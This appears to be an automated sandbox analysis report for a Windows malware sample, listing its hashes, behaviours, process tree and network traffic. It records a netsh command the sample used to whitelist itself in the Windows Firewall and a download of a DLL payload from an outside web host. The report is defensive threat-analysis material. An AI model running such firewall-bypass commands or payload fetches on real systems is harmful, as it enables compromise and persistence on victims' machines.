Analysis

  • max time kernel
    140s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/07/2024, 02:24 UTC

General

  • Target

    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe

  • Size

    267KB

  • MD5

    4c6c39e2bf83e6f7d191d350e6f07330

  • SHA1

    0d279881815f20a4a24810b59be49a399705a16f

  • SHA256

    32c8a8315c9fc9dbef20cd46b04b476b40f29fd689ed4cc9804d7f22d6343d39

  • SHA512

    103c0414b9cb65ad8af3d9f808b7c16f9e6b7f09d912b3c8e7bef748bb9b60c677bc8ef21fedb894af1f673f0e651616e97396c0a2bac55cf0f161df0f9034aa

  • SSDEEP

    6144:1VUAWgWdIvA3roOXGbb0foxfdKTcPwA+GFpyITCBnIxeV/Pvi3:16ANI7Nqb0fulC2FYITc+q/P

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe" Msnnmsg ENABLE
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:2908

Network

  • flag-us
    DNS
    www.hamperz.co.uk
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hamperz.co.uk
    IN A
    Response
    www.hamperz.co.uk
    IN A
    85.233.160.215
  • flag-gb
    GET
    http://www.hamperz.co.uk/catalog/temp/conf/psy_1024.dll
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    Remote address:
    85.233.160.215:80
    Request
    GET /catalog/temp/conf/psy_1024.dll HTTP/1.1
    Content-Type: text/html
    Host: www.hamperz.co.uk
    Accept: text/html, */*
    User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, must-revalidate, no-cache
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 245
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
  • 85.233.160.215:80
    http://www.hamperz.co.uk/catalog/temp/conf/psy_1024.dll
    http
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    450 B
    742 B
    6
    6

    HTTP Request

    GET http://www.hamperz.co.uk/catalog/temp/conf/psy_1024.dll

    HTTP Response

    200
  • 8.8.8.8:53
    www.hamperz.co.uk
    dns
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    63 B
    79 B
    1
    1

    DNS Request

    www.hamperz.co.uk

    DNS Response

    85.233.160.215

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe

    Filesize

    267KB

    MD5

    4c6c39e2bf83e6f7d191d350e6f07330

    SHA1

    0d279881815f20a4a24810b59be49a399705a16f

    SHA256

    32c8a8315c9fc9dbef20cd46b04b476b40f29fd689ed4cc9804d7f22d6343d39

    SHA512

    103c0414b9cb65ad8af3d9f808b7c16f9e6b7f09d912b3c8e7bef748bb9b60c677bc8ef21fedb894af1f673f0e651616e97396c0a2bac55cf0f161df0f9034aa

  • memory/2484-0-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

  • memory/2484-4-0x0000000000400000-0x00000000004A5000-memory.dmp

    Filesize

    660KB